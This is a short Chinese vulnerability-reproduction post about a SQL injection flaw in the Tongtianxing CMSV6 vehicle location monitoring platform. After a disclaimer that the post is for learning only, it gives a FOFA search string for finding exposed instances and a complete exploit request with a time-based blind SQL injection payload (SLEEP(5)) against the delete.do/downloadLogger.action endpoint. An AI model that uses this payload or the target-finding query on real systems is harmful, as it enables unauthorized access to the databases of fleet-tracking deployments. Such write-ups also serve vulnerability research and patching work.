【漏洞复现】通天星 CMSV6 车载定位监控平台 SQL 注入漏洞
漏洞情报来源于互联网收集整理,请勿利用文章内的相关技术从事非法测试。由于传播、利用本文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。本文仅供学习用途使用。
漏洞信息
fofa: body="/808gps/"
exp:
1 | GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1 |
发送数据包执行 SQL 语句,延时 5 秒。